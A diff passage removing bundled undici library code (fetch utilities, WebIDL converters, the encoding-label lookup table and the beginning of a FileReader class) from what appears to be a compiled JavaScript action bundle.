- const { index, kind, target } = object - const values = target() - - // 9. Let len be the length of values. - const len = values.length - - // 10. If index is greater than or equal to len, then return - // CreateIterResultObject(undefined, true). - if (index >= len) { - return { value: undefined, done: true } - } - - // 11. Let pair be the entry in values at index index. - const pair = values[index] - - // 12. Set object’s index to index + 1. - object.index = index + 1 - - // 13. Return the iterator result for pair and kind. - return iteratorResult(pair, kind) - }, - // The class string of an iterator prototype object for a given interface is the - // result of concatenating the identifier of the interface and the string " Iterator". - [Symbol.toStringTag]: `${name} Iterator` - } - - // The [[Prototype]] internal slot of an iterator prototype object must be %IteratorPrototype%. - Object.setPrototypeOf(i, esIteratorPrototype) - // esIteratorPrototype needs to be the prototype of i - // which is the prototype of an empty object. Yes, it's confusing. - return Object.setPrototypeOf({}, i) -} - -// https://webidl.spec.whatwg.org/#iterator-result -function iteratorResult (pair, kind) { - let result - - // 1. Let result be a value determined by the value of kind: - switch (kind) { - case 'key': { - // 1. Let idlKey be pair’s key. - // 2. Let key be the result of converting idlKey to an - // ECMAScript value. - // 3. result is key. - result = pair[0] - break - } - case 'value': { - // 1. Let idlValue be pair’s value. - // 2. Let value be the result of converting idlValue to - // an ECMAScript value. - // 3. result is value. - result = pair[1] - break - } - case 'key+value': { - // 1. Let idlKey be pair’s key. - // 2. Let idlValue be pair’s value. - // 3. Let key be the result of converting idlKey to an - // ECMAScript value. - // 4. Let value be the result of converting idlValue to - // an ECMAScript value. - // 5. Let array be ! ArrayCreate(2). - // 6. Call ! 
CreateDataProperty(array, "0", key). - // 7. Call ! CreateDataProperty(array, "1", value). - // 8. result is array. - result = pair - break - } - } - - // 2. Return CreateIterResultObject(result, false). - return { value: result, done: false } -} - -/** - * @see https://fetch.spec.whatwg.org/#body-fully-read - */ -async function fullyReadBody (body, processBody, processBodyError) { - // 1. If taskDestination is null, then set taskDestination to - // the result of starting a new parallel queue. - - // 2. Let successSteps given a byte sequence bytes be to queue a - // fetch task to run processBody given bytes, with taskDestination. - const successSteps = processBody - - // 3. Let errorSteps be to queue a fetch task to run processBodyError, - // with taskDestination. - const errorSteps = processBodyError - - // 4. Let reader be the result of getting a reader for body’s stream. - // If that threw an exception, then run errorSteps with that - // exception and return. - let reader - - try { - reader = body.stream.getReader() - } catch (e) { - errorSteps(e) - return - } - - // 5. Read all bytes from reader, given successSteps and errorSteps. - try { - const result = await readAllBytes(reader) - successSteps(result) - } catch (e) { - errorSteps(e) - } -} - -/** @type {ReadableStream} */ -let ReadableStream = globalThis.ReadableStream - -function isReadableStreamLike (stream) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - return stream instanceof ReadableStream || ( - stream[Symbol.toStringTag] === 'ReadableStream' && - typeof stream.tee === 'function' - ) -} - -const MAXIMUM_ARGUMENT_LENGTH = 65535 - -/** - * @see https://infra.spec.whatwg.org/#isomorphic-decode - * @param {number[]|Uint8Array} input - */ -function isomorphicDecode (input) { - // 1. 
To isomorphic decode a byte sequence input, return a string whose code point - // length is equal to input’s length and whose code points have the same values - // as the values of input’s bytes, in the same order. - - if (input.length < MAXIMUM_ARGUMENT_LENGTH) { - return String.fromCharCode(...input) - } - - return input.reduce((previous, current) => previous + String.fromCharCode(current), '') -} - -/** - * @param {ReadableStreamController} controller - */ -function readableStreamClose (controller) { - try { - controller.close() - } catch (err) { - // TODO: add comment explaining why this error occurs. - if (!err.message.includes('Controller is already closed')) { - throw err - } - } -} - -/** - * @see https://infra.spec.whatwg.org/#isomorphic-encode - * @param {string} input - */ -function isomorphicEncode (input) { - // 1. Assert: input contains no code points greater than U+00FF. - for (let i = 0; i < input.length; i++) { - assert(input.charCodeAt(i) <= 0xFF) - } - - // 2. Return a byte sequence whose length is equal to input’s code - // point length and whose bytes have the same values as the - // values of input’s code points, in the same order - return input -} - -/** - * @see https://streams.spec.whatwg.org/#readablestreamdefaultreader-read-all-bytes - * @see https://streams.spec.whatwg.org/#read-loop - * @param {ReadableStreamDefaultReader} reader - */ -async function readAllBytes (reader) { - const bytes = [] - let byteLength = 0 - - while (true) { - const { done, value: chunk } = await reader.read() - - if (done) { - // 1. Call successSteps with bytes. - return Buffer.concat(bytes, byteLength) - } - - // 1. If chunk is not a Uint8Array object, call failureSteps - // with a TypeError and abort these steps. - if (!isUint8Array(chunk)) { - throw new TypeError('Received non-Uint8Array chunk') - } - - // 2. Append the bytes represented by chunk to bytes. - bytes.push(chunk) - byteLength += chunk.length - - // 3. 
Read-loop given reader, bytes, successSteps, and failureSteps. - } -} - -/** - * @see https://fetch.spec.whatwg.org/#is-local - * @param {URL} url - */ -function urlIsLocal (url) { - assert('protocol' in url) // ensure it's a url object - - const protocol = url.protocol - - return protocol === 'about:' || protocol === 'blob:' || protocol === 'data:' -} - -/** - * @param {string|URL} url - */ -function urlHasHttpsScheme (url) { - if (typeof url === 'string') { - return url.startsWith('https:') - } - - return url.protocol === 'https:' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-scheme - * @param {URL} url - */ -function urlIsHttpHttpsScheme (url) { - assert('protocol' in url) // ensure it's a url object - - const protocol = url.protocol - - return protocol === 'http:' || protocol === 'https:' -} - -/** - * Fetch supports node >= 16.8.0, but Object.hasOwn was added in v16.9.0. - */ -const hasOwn = Object.hasOwn || ((dict, key) => Object.prototype.hasOwnProperty.call(dict, key)) - -module.exports = { - isAborted, - isCancelled, - createDeferredPromise, - ReadableStreamFrom, - toUSVString, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - coarsenedSharedCurrentTime, - determineRequestsReferrer, - makePolicyContainer, - clonePolicyContainer, - appendFetchMetadata, - appendRequestOriginHeader, - TAOCheck, - corsCheck, - crossOriginResourcePolicyCheck, - createOpaqueTimingInfo, - setRequestReferrerPolicyOnRedirect, - isValidHTTPToken, - requestBadPort, - requestCurrentURL, - responseURL, - responseLocationURL, - isBlobLike, - isURLPotentiallyTrustworthy, - isValidReasonPhrase, - sameOrigin, - normalizeMethod, - serializeJavascriptValueToJSONString, - makeIterator, - isValidHeaderName, - isValidHeaderValue, - hasOwn, - isErrorLike, - fullyReadBody, - bytesMatch, - isReadableStreamLike, - readableStreamClose, - isomorphicEncode, - isomorphicDecode, - urlIsLocal, - urlHasHttpsScheme, - urlIsHttpHttpsScheme, - readAllBytes, - normalizeMethodRecord -} - - -/***/ }), 
- -/***/ 1744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { types } = __nccwpck_require__(3837) -const { hasOwn, toUSVString } = __nccwpck_require__(2538) - -/** @type {import('../../types/webidl').Webidl} */ -const webidl = {} -webidl.converters = {} -webidl.util = {} -webidl.errors = {} - -webidl.errors.exception = function (message) { - return new TypeError(`${message.header}: ${message.message}`) -} - -webidl.errors.conversionFailed = function (context) { - const plural = context.types.length === 1 ? '' : ' one of' - const message = - `${context.argument} could not be converted to` + - `${plural}: ${context.types.join(', ')}.` - - return webidl.errors.exception({ - header: context.prefix, - message - }) -} - -webidl.errors.invalidArgument = function (context) { - return webidl.errors.exception({ - header: context.prefix, - message: `"${context.value}" is an invalid ${context.type}.` - }) -} - -// https://webidl.spec.whatwg.org/#implements -webidl.brandCheck = function (V, I, opts = undefined) { - if (opts?.strict !== false && !(V instanceof I)) { - throw new TypeError('Illegal invocation') - } else { - return V?.[Symbol.toStringTag] === I.prototype[Symbol.toStringTag] - } -} - -webidl.argumentLengthCheck = function ({ length }, min, ctx) { - if (length < min) { - throw webidl.errors.exception({ - message: `${min} argument${min !== 1 ? 's' : ''} required, ` + - `but${length ? 
' only' : ''} ${length} found.`, - ...ctx - }) - } -} - -webidl.illegalConstructor = function () { - throw webidl.errors.exception({ - header: 'TypeError', - message: 'Illegal constructor' - }) -} - -// https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values -webidl.util.Type = function (V) { - switch (typeof V) { - case 'undefined': return 'Undefined' - case 'boolean': return 'Boolean' - case 'string': return 'String' - case 'symbol': return 'Symbol' - case 'number': return 'Number' - case 'bigint': return 'BigInt' - case 'function': - case 'object': { - if (V === null) { - return 'Null' - } - - return 'Object' - } - } -} - -// https://webidl.spec.whatwg.org/#abstract-opdef-converttoint -webidl.util.ConvertToInt = function (V, bitLength, signedness, opts = {}) { - let upperBound - let lowerBound - - // 1. If bitLength is 64, then: - if (bitLength === 64) { - // 1. Let upperBound be 2^53 − 1. - upperBound = Math.pow(2, 53) - 1 - - // 2. If signedness is "unsigned", then let lowerBound be 0. - if (signedness === 'unsigned') { - lowerBound = 0 - } else { - // 3. Otherwise let lowerBound be −2^53 + 1. - lowerBound = Math.pow(-2, 53) + 1 - } - } else if (signedness === 'unsigned') { - // 2. Otherwise, if signedness is "unsigned", then: - - // 1. Let lowerBound be 0. - lowerBound = 0 - - // 2. Let upperBound be 2^bitLength − 1. - upperBound = Math.pow(2, bitLength) - 1 - } else { - // 3. Otherwise: - - // 1. Let lowerBound be -2^bitLength − 1. - lowerBound = Math.pow(-2, bitLength) - 1 - - // 2. Let upperBound be 2^bitLength − 1 − 1. - upperBound = Math.pow(2, bitLength - 1) - 1 - } - - // 4. Let x be ? ToNumber(V). - let x = Number(V) - - // 5. If x is −0, then set x to +0. - if (x === 0) { - x = 0 - } - - // 6. If the conversion is to an IDL type associated - // with the [EnforceRange] extended attribute, then: - if (opts.enforceRange === true) { - // 1. If x is NaN, +∞, or −∞, then throw a TypeError. 
- if ( - Number.isNaN(x) || - x === Number.POSITIVE_INFINITY || - x === Number.NEGATIVE_INFINITY - ) { - throw webidl.errors.exception({ - header: 'Integer conversion', - message: `Could not convert ${V} to an integer.` - }) - } - - // 2. Set x to IntegerPart(x). - x = webidl.util.IntegerPart(x) - - // 3. If x < lowerBound or x > upperBound, then - // throw a TypeError. - if (x < lowerBound || x > upperBound) { - throw webidl.errors.exception({ - header: 'Integer conversion', - message: `Value must be between ${lowerBound}-${upperBound}, got ${x}.` - }) - } - - // 4. Return x. - return x - } - - // 7. If x is not NaN and the conversion is to an IDL - // type associated with the [Clamp] extended - // attribute, then: - if (!Number.isNaN(x) && opts.clamp === true) { - // 1. Set x to min(max(x, lowerBound), upperBound). - x = Math.min(Math.max(x, lowerBound), upperBound) - - // 2. Round x to the nearest integer, choosing the - // even integer if it lies halfway between two, - // and choosing +0 rather than −0. - if (Math.floor(x) % 2 === 0) { - x = Math.floor(x) - } else { - x = Math.ceil(x) - } - - // 3. Return x. - return x - } - - // 8. If x is NaN, +0, +∞, or −∞, then return +0. - if ( - Number.isNaN(x) || - (x === 0 && Object.is(0, x)) || - x === Number.POSITIVE_INFINITY || - x === Number.NEGATIVE_INFINITY - ) { - return 0 - } - - // 9. Set x to IntegerPart(x). - x = webidl.util.IntegerPart(x) - - // 10. Set x to x modulo 2^bitLength. - x = x % Math.pow(2, bitLength) - - // 11. If signedness is "signed" and x ≥ 2^bitLength − 1, - // then return x − 2^bitLength. - if (signedness === 'signed' && x >= Math.pow(2, bitLength) - 1) { - return x - Math.pow(2, bitLength) - } - - // 12. Otherwise, return x. - return x -} - -// https://webidl.spec.whatwg.org/#abstract-opdef-integerpart -webidl.util.IntegerPart = function (n) { - // 1. Let r be floor(abs(n)). - const r = Math.floor(Math.abs(n)) - - // 2. If n < 0, then return -1 × r. 
- if (n < 0) { - return -1 * r - } - - // 3. Otherwise, return r. - return r -} - -// https://webidl.spec.whatwg.org/#es-sequence -webidl.sequenceConverter = function (converter) { - return (V) => { - // 1. If Type(V) is not Object, throw a TypeError. - if (webidl.util.Type(V) !== 'Object') { - throw webidl.errors.exception({ - header: 'Sequence', - message: `Value of type ${webidl.util.Type(V)} is not an Object.` - }) - } - - // 2. Let method be ? GetMethod(V, @@iterator). - /** @type {Generator} */ - const method = V?.[Symbol.iterator]?.() - const seq = [] - - // 3. If method is undefined, throw a TypeError. - if ( - method === undefined || - typeof method.next !== 'function' - ) { - throw webidl.errors.exception({ - header: 'Sequence', - message: 'Object is not an iterator.' - }) - } - - // https://webidl.spec.whatwg.org/#create-sequence-from-iterable - while (true) { - const { done, value } = method.next() - - if (done) { - break - } - - seq.push(converter(value)) - } - - return seq - } -} - -// https://webidl.spec.whatwg.org/#es-to-record -webidl.recordConverter = function (keyConverter, valueConverter) { - return (O) => { - // 1. If Type(O) is not Object, throw a TypeError. - if (webidl.util.Type(O) !== 'Object') { - throw webidl.errors.exception({ - header: 'Record', - message: `Value of type ${webidl.util.Type(O)} is not an Object.` - }) - } - - // 2. Let result be a new empty instance of record. - const result = {} - - if (!types.isProxy(O)) { - // Object.keys only returns enumerable properties - const keys = Object.keys(O) - - for (const key of keys) { - // 1. Let typedKey be key converted to an IDL value of type K. - const typedKey = keyConverter(key) - - // 2. Let value be ? Get(O, key). - // 3. Let typedValue be value converted to an IDL value of type V. - const typedValue = valueConverter(O[key]) - - // 4. Set result[typedKey] to typedValue. - result[typedKey] = typedValue - } - - // 5. Return result. - return result - } - - // 3. Let keys be ? 
O.[[OwnPropertyKeys]](). - const keys = Reflect.ownKeys(O) - - // 4. For each key of keys. - for (const key of keys) { - // 1. Let desc be ? O.[[GetOwnProperty]](key). - const desc = Reflect.getOwnPropertyDescriptor(O, key) - - // 2. If desc is not undefined and desc.[[Enumerable]] is true: - if (desc?.enumerable) { - // 1. Let typedKey be key converted to an IDL value of type K. - const typedKey = keyConverter(key) - - // 2. Let value be ? Get(O, key). - // 3. Let typedValue be value converted to an IDL value of type V. - const typedValue = valueConverter(O[key]) - - // 4. Set result[typedKey] to typedValue. - result[typedKey] = typedValue - } - } - - // 5. Return result. - return result - } -} - -webidl.interfaceConverter = function (i) { - return (V, opts = {}) => { - if (opts.strict !== false && !(V instanceof i)) { - throw webidl.errors.exception({ - header: i.name, - message: `Expected ${V} to be an instance of ${i.name}.` - }) - } - - return V - } -} - -webidl.dictionaryConverter = function (converters) { - return (dictionary) => { - const type = webidl.util.Type(dictionary) - const dict = {} - - if (type === 'Null' || type === 'Undefined') { - return dict - } else if (type !== 'Object') { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `Expected ${dictionary} to be one of: Null, Undefined, Object.` - }) - } - - for (const options of converters) { - const { key, defaultValue, required, converter } = options - - if (required === true) { - if (!hasOwn(dictionary, key)) { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `Missing required key "${key}".` - }) - } - } - - let value = dictionary[key] - const hasDefault = hasOwn(options, 'defaultValue') - - // Only use defaultValue if value is undefined and - // a defaultValue options was provided. - if (hasDefault && value !== null) { - value = value ?? defaultValue - } - - // A key can be optional and have no default value. 
- // When this happens, do not perform a conversion, - // and do not assign the key a value. - if (required || hasDefault || value !== undefined) { - value = converter(value) - - if ( - options.allowedValues && - !options.allowedValues.includes(value) - ) { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `${value} is not an accepted type. Expected one of ${options.allowedValues.join(', ')}.` - }) - } - - dict[key] = value - } - } - - return dict - } -} - -webidl.nullableConverter = function (converter) { - return (V) => { - if (V === null) { - return V - } - - return converter(V) - } -} - -// https://webidl.spec.whatwg.org/#es-DOMString -webidl.converters.DOMString = function (V, opts = {}) { - // 1. If V is null and the conversion is to an IDL type - // associated with the [LegacyNullToEmptyString] - // extended attribute, then return the DOMString value - // that represents the empty string. - if (V === null && opts.legacyNullToEmptyString) { - return '' - } - - // 2. Let x be ? ToString(V). - if (typeof V === 'symbol') { - throw new TypeError('Could not convert argument of type symbol to string.') - } - - // 3. Return the IDL DOMString value that represents the - // same sequence of code units as the one the - // ECMAScript String value x represents. - return String(V) -} - -// https://webidl.spec.whatwg.org/#es-ByteString -webidl.converters.ByteString = function (V) { - // 1. Let x be ? ToString(V). - // Note: DOMString converter perform ? ToString(V) - const x = webidl.converters.DOMString(V) - - // 2. If the value of any element of x is greater than - // 255, then throw a TypeError. - for (let index = 0; index < x.length; index++) { - if (x.charCodeAt(index) > 255) { - throw new TypeError( - 'Cannot convert argument to a ByteString because the character at ' + - `index ${index} has a value of ${x.charCodeAt(index)} which is greater than 255.` - ) - } - } - - // 3. 
Return an IDL ByteString value whose length is the - // length of x, and where the value of each element is - // the value of the corresponding element of x. - return x -} - -// https://webidl.spec.whatwg.org/#es-USVString -webidl.converters.USVString = toUSVString - -// https://webidl.spec.whatwg.org/#es-boolean -webidl.converters.boolean = function (V) { - // 1. Let x be the result of computing ToBoolean(V). - const x = Boolean(V) - - // 2. Return the IDL boolean value that is the one that represents - // the same truth value as the ECMAScript Boolean value x. - return x -} - -// https://webidl.spec.whatwg.org/#es-any -webidl.converters.any = function (V) { - return V -} - -// https://webidl.spec.whatwg.org/#es-long-long -webidl.converters['long long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 64, "signed"). - const x = webidl.util.ConvertToInt(V, 64, 'signed') - - // 2. Return the IDL long long value that represents - // the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-long-long -webidl.converters['unsigned long long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 64, "unsigned"). - const x = webidl.util.ConvertToInt(V, 64, 'unsigned') - - // 2. Return the IDL unsigned long long value that - // represents the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-long -webidl.converters['unsigned long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 32, "unsigned"). - const x = webidl.util.ConvertToInt(V, 32, 'unsigned') - - // 2. Return the IDL unsigned long value that - // represents the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-short -webidl.converters['unsigned short'] = function (V, opts) { - // 1. Let x be ? ConvertToInt(V, 16, "unsigned"). - const x = webidl.util.ConvertToInt(V, 16, 'unsigned', opts) - - // 2. Return the IDL unsigned short value that represents - // the same numeric value as x. 
- return x -} - -// https://webidl.spec.whatwg.org/#idl-ArrayBuffer -webidl.converters.ArrayBuffer = function (V, opts = {}) { - // 1. If Type(V) is not Object, or V does not have an - // [[ArrayBufferData]] internal slot, then throw a - // TypeError. - // see: https://tc39.es/ecma262/#sec-properties-of-the-arraybuffer-instances - // see: https://tc39.es/ecma262/#sec-properties-of-the-sharedarraybuffer-instances - if ( - webidl.util.Type(V) !== 'Object' || - !types.isAnyArrayBuffer(V) - ) { - throw webidl.errors.conversionFailed({ - prefix: `${V}`, - argument: `${V}`, - types: ['ArrayBuffer'] - }) - } - - // 2. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V) is true, then throw a - // TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V) is true, then throw a - // TypeError. - // Note: resizable ArrayBuffers are currently a proposal. - - // 4. Return the IDL ArrayBuffer value that is a - // reference to the same object as V. - return V -} - -webidl.converters.TypedArray = function (V, T, opts = {}) { - // 1. Let T be the IDL type V is being converted to. - - // 2. If Type(V) is not Object, or V does not have a - // [[TypedArrayName]] internal slot with a value - // equal to T’s name, then throw a TypeError. - if ( - webidl.util.Type(V) !== 'Object' || - !types.isTypedArray(V) || - V.constructor.name !== T.name - ) { - throw webidl.errors.conversionFailed({ - prefix: `${T.name}`, - argument: `${V}`, - types: [T.name] - }) - } - - // 3. 
If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 4. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - // Note: resizable array buffers are currently a proposal - - // 5. Return the IDL value of type T that is a reference - // to the same object as V. - return V -} - -webidl.converters.DataView = function (V, opts = {}) { - // 1. If Type(V) is not Object, or V does not have a - // [[DataView]] internal slot, then throw a TypeError. - if (webidl.util.Type(V) !== 'Object' || !types.isDataView(V)) { - throw webidl.errors.exception({ - header: 'DataView', - message: 'Object is not a DataView.' - }) - } - - // 2. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is true, - // then throw a TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - // Note: resizable ArrayBuffers are currently a proposal - - // 4. Return the IDL DataView value that is a reference - // to the same object as V. 
- return V -} - -// https://webidl.spec.whatwg.org/#BufferSource -webidl.converters.BufferSource = function (V, opts = {}) { - if (types.isAnyArrayBuffer(V)) { - return webidl.converters.ArrayBuffer(V, opts) - } - - if (types.isTypedArray(V)) { - return webidl.converters.TypedArray(V, V.constructor) - } - - if (types.isDataView(V)) { - return webidl.converters.DataView(V, opts) - } - - throw new TypeError(`Could not convert ${V} to a BufferSource.`) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.ByteString -) - -webidl.converters['sequence>'] = webidl.sequenceConverter( - webidl.converters['sequence'] -) - -webidl.converters['record'] = webidl.recordConverter( - webidl.converters.ByteString, - webidl.converters.ByteString -) - -module.exports = { - webidl -} - - -/***/ }), - -/***/ 4854: -/***/ ((module) => { - -"use strict"; - - -/** - * @see https://encoding.spec.whatwg.org/#concept-encoding-get - * @param {string|undefined} label - */ -function getEncoding (label) { - if (!label) { - return 'failure' - } - - // 1. Remove any leading and trailing ASCII whitespace from label. - // 2. If label is an ASCII case-insensitive match for any of the - // labels listed in the table below, then return the - // corresponding encoding; otherwise return failure. 
- switch (label.trim().toLowerCase()) { - case 'unicode-1-1-utf-8': - case 'unicode11utf8': - case 'unicode20utf8': - case 'utf-8': - case 'utf8': - case 'x-unicode20utf8': - return 'UTF-8' - case '866': - case 'cp866': - case 'csibm866': - case 'ibm866': - return 'IBM866' - case 'csisolatin2': - case 'iso-8859-2': - case 'iso-ir-101': - case 'iso8859-2': - case 'iso88592': - case 'iso_8859-2': - case 'iso_8859-2:1987': - case 'l2': - case 'latin2': - return 'ISO-8859-2' - case 'csisolatin3': - case 'iso-8859-3': - case 'iso-ir-109': - case 'iso8859-3': - case 'iso88593': - case 'iso_8859-3': - case 'iso_8859-3:1988': - case 'l3': - case 'latin3': - return 'ISO-8859-3' - case 'csisolatin4': - case 'iso-8859-4': - case 'iso-ir-110': - case 'iso8859-4': - case 'iso88594': - case 'iso_8859-4': - case 'iso_8859-4:1988': - case 'l4': - case 'latin4': - return 'ISO-8859-4' - case 'csisolatincyrillic': - case 'cyrillic': - case 'iso-8859-5': - case 'iso-ir-144': - case 'iso8859-5': - case 'iso88595': - case 'iso_8859-5': - case 'iso_8859-5:1988': - return 'ISO-8859-5' - case 'arabic': - case 'asmo-708': - case 'csiso88596e': - case 'csiso88596i': - case 'csisolatinarabic': - case 'ecma-114': - case 'iso-8859-6': - case 'iso-8859-6-e': - case 'iso-8859-6-i': - case 'iso-ir-127': - case 'iso8859-6': - case 'iso88596': - case 'iso_8859-6': - case 'iso_8859-6:1987': - return 'ISO-8859-6' - case 'csisolatingreek': - case 'ecma-118': - case 'elot_928': - case 'greek': - case 'greek8': - case 'iso-8859-7': - case 'iso-ir-126': - case 'iso8859-7': - case 'iso88597': - case 'iso_8859-7': - case 'iso_8859-7:1987': - case 'sun_eu_greek': - return 'ISO-8859-7' - case 'csiso88598e': - case 'csisolatinhebrew': - case 'hebrew': - case 'iso-8859-8': - case 'iso-8859-8-e': - case 'iso-ir-138': - case 'iso8859-8': - case 'iso88598': - case 'iso_8859-8': - case 'iso_8859-8:1988': - case 'visual': - return 'ISO-8859-8' - case 'csiso88598i': - case 'iso-8859-8-i': - case 'logical': - return 
'ISO-8859-8-I' - case 'csisolatin6': - case 'iso-8859-10': - case 'iso-ir-157': - case 'iso8859-10': - case 'iso885910': - case 'l6': - case 'latin6': - return 'ISO-8859-10' - case 'iso-8859-13': - case 'iso8859-13': - case 'iso885913': - return 'ISO-8859-13' - case 'iso-8859-14': - case 'iso8859-14': - case 'iso885914': - return 'ISO-8859-14' - case 'csisolatin9': - case 'iso-8859-15': - case 'iso8859-15': - case 'iso885915': - case 'iso_8859-15': - case 'l9': - return 'ISO-8859-15' - case 'iso-8859-16': - return 'ISO-8859-16' - case 'cskoi8r': - case 'koi': - case 'koi8': - case 'koi8-r': - case 'koi8_r': - return 'KOI8-R' - case 'koi8-ru': - case 'koi8-u': - return 'KOI8-U' - case 'csmacintosh': - case 'mac': - case 'macintosh': - case 'x-mac-roman': - return 'macintosh' - case 'iso-8859-11': - case 'iso8859-11': - case 'iso885911': - case 'tis-620': - case 'windows-874': - return 'windows-874' - case 'cp1250': - case 'windows-1250': - case 'x-cp1250': - return 'windows-1250' - case 'cp1251': - case 'windows-1251': - case 'x-cp1251': - return 'windows-1251' - case 'ansi_x3.4-1968': - case 'ascii': - case 'cp1252': - case 'cp819': - case 'csisolatin1': - case 'ibm819': - case 'iso-8859-1': - case 'iso-ir-100': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'iso_8859-1:1987': - case 'l1': - case 'latin1': - case 'us-ascii': - case 'windows-1252': - case 'x-cp1252': - return 'windows-1252' - case 'cp1253': - case 'windows-1253': - case 'x-cp1253': - return 'windows-1253' - case 'cp1254': - case 'csisolatin5': - case 'iso-8859-9': - case 'iso-ir-148': - case 'iso8859-9': - case 'iso88599': - case 'iso_8859-9': - case 'iso_8859-9:1989': - case 'l5': - case 'latin5': - case 'windows-1254': - case 'x-cp1254': - return 'windows-1254' - case 'cp1255': - case 'windows-1255': - case 'x-cp1255': - return 'windows-1255' - case 'cp1256': - case 'windows-1256': - case 'x-cp1256': - return 'windows-1256' - case 'cp1257': - case 'windows-1257': - case 
'x-cp1257': - return 'windows-1257' - case 'cp1258': - case 'windows-1258': - case 'x-cp1258': - return 'windows-1258' - case 'x-mac-cyrillic': - case 'x-mac-ukrainian': - return 'x-mac-cyrillic' - case 'chinese': - case 'csgb2312': - case 'csiso58gb231280': - case 'gb2312': - case 'gb_2312': - case 'gb_2312-80': - case 'gbk': - case 'iso-ir-58': - case 'x-gbk': - return 'GBK' - case 'gb18030': - return 'gb18030' - case 'big5': - case 'big5-hkscs': - case 'cn-big5': - case 'csbig5': - case 'x-x-big5': - return 'Big5' - case 'cseucpkdfmtjapanese': - case 'euc-jp': - case 'x-euc-jp': - return 'EUC-JP' - case 'csiso2022jp': - case 'iso-2022-jp': - return 'ISO-2022-JP' - case 'csshiftjis': - case 'ms932': - case 'ms_kanji': - case 'shift-jis': - case 'shift_jis': - case 'sjis': - case 'windows-31j': - case 'x-sjis': - return 'Shift_JIS' - case 'cseuckr': - case 'csksc56011987': - case 'euc-kr': - case 'iso-ir-149': - case 'korean': - case 'ks_c_5601-1987': - case 'ks_c_5601-1989': - case 'ksc5601': - case 'ksc_5601': - case 'windows-949': - return 'EUC-KR' - case 'csiso2022kr': - case 'hz-gb-2312': - case 'iso-2022-cn': - case 'iso-2022-cn-ext': - case 'iso-2022-kr': - case 'replacement': - return 'replacement' - case 'unicodefffe': - case 'utf-16be': - return 'UTF-16BE' - case 'csunicode': - case 'iso-10646-ucs-2': - case 'ucs-2': - case 'unicode': - case 'unicodefeff': - case 'utf-16': - case 'utf-16le': - return 'UTF-16LE' - case 'x-user-defined': - return 'x-user-defined' - default: return 'failure' - } -} - -module.exports = { - getEncoding -} - - -/***/ }), - -/***/ 1446: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - staticPropertyDescriptors, - readOperation, - fireAProgressEvent -} = __nccwpck_require__(7530) -const { - kState, - kError, - kResult, - kEvents, - kAborted -} = __nccwpck_require__(9054) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - 
-class FileReader extends EventTarget { - constructor () { - super() - - this[kState] = 'empty' - this[kResult] = null - this[kError] = null - this[kEvents] = { - loadend: null, - error: null, - abort: null, - load: null, - progress: null, - loadstart: null - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-readAsArrayBuffer - * @param {import('buffer').Blob} blob - */ - readAsArrayBuffer (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsArrayBuffer' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsArrayBuffer(blob) method, when invoked, - // must initiate a read operation for blob with ArrayBuffer. - readOperation(this, blob, 'ArrayBuffer') - } - - /** - * @see https://w3c.github.io/FileAPI/#readAsBinaryString - * @param {import('buffer').Blob} blob - */ - readAsBinaryString (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsBinaryString' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsBinaryString(blob) method, when invoked, - // must initiate a read operation for blob with BinaryString. - readOperation(this, blob, 'BinaryString') - } - - /** - * @see https://w3c.github.io/FileAPI/#readAsDataText - * @param {import('buffer').Blob} blob - * @param {string?} encoding - */ - readAsText (blob, encoding = undefined) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsText' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - if (encoding !== undefined) { - encoding = webidl.converters.DOMString(encoding) - } - - // The readAsText(blob, encoding) method, when invoked, - // must initiate a read operation for blob with Text and encoding. 
